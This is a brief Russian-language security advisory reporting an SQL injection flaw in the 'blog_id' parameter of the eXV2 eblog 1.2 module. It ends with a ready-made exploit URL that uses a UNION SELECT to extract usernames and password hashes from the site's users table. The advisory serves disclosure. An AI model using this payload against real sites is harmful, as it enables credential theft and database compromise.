Программа: eXV2 Module eblog 1.2
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «blog_id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
modules/eblog/index.php?blog_id=-9999999/**/union/**/select/* */concat(uname,0x3a,pass)/**/from/**/e_xoops_users/*where%20exv2_admin%201
